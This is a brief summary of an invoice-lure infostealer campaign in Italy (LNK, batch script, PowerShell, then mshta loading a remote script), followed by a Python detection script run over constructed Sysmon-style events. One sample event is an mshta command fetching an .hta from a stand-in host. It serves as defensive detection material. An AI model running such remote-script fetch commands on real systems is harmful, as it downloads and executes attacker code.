An unnamed information stealer was targeting end users in Italy through a phishing campaign that used an “Invoice”-themed subject line to deliver an LNK file.
Once the LNK file was clicked, the unsuspecting recipient was led to download a password-protected archive containing a malicious batch script and a second LNK file.
Executing the LNK file from the archive spawned a PowerShell command that invoked the MSHTA binary (mshta.exe) to run a script directly from a remote URL.
Additional files were then dropped, after which the malware established persistence on the target machine and collected cryptocurrency wallet data, web browser data, and system information for the threat actors to exfiltrate and use later.
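The chain above leaves two process-creation artifacts a defender can hunt for without any campaign-specific indicator: mshta.exe being handed a remote URL (here by a PowerShell parent), and a batch script being executed from a user-writable directory after an archive is opened. The script below is an added example, not code or telemetry from the report; it runs simple classification logic over constructed log lines whose field names mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine). The domain, user name and file names in the samples are invented, and the " | "-delimited line format is an assumption made for the example rather than a real Sysmon export.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (not real telemetry). Field names follow
# Sysmon Event ID 1; the " | " separator is an assumption for this example only.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\mshta.exe | ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=mshta.exe http://example.invalid/fattura/index.hta",
    r'Image=C:\Windows\System32\cmd.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=cmd.exe /c "C:\Users\mario\Downloads\Fattura\install.bat"',
    r"Image=C:\Windows\System32\mshta.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=mshta.exe C:\Program Files\Vendor\help.hta",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ParentImage=C:\Windows\explorer.exe | CommandLine=powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
]

URL_RE = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Path fragments (lower-cased) where a dropped batch file would typically land.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Split one constructed 'Key=Value | Key=Value' line into a ProcEvent."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")  # only the first '=' is a separator
        fields[key.strip().lower()] = value.strip()
    return ProcEvent(fields["image"], fields["parentimage"], fields["commandline"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event looks like the LNK -> batch -> mshta chain."""
    reasons = []
    image, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line.lower()

    # Stage 3 of the chain: a script host fetching its payload over HTTP(S).
    if image in SCRIPT_HOSTS and URL_RE.search(ev.command_line):
        reasons.append(f"{image} given a remote URL")
        if parent in SHELLS:
            reasons.append(f"spawned by {parent}")

    # Stage 2 of the chain: a batch file run out of a user-writable location.
    if image in SHELLS and ".bat" in cmd and any(p in cmd for p in USER_WRITABLE):
        reasons.append("batch script executed from a user-writable path")

    return reasons


def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map the index of every suspicious line to the reasons it was flagged."""
    flagged = {}
    for i, line in enumerate(lines):
        reasons = classify(parse_event(line))
        if reasons:
            flagged[i] = reasons
    return flagged


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

The benign samples (a local .hta opened from Explorer, a signed inventory script) are not flagged, which is the point of keying on a remote URL and a user-writable path rather than on mshta.exe or cmd.exe alone. In production the same logic belongs in a SIEM rule over real Sysmon or EDR data, where command lines can legitimately contain "|" and the parser here would need replacing.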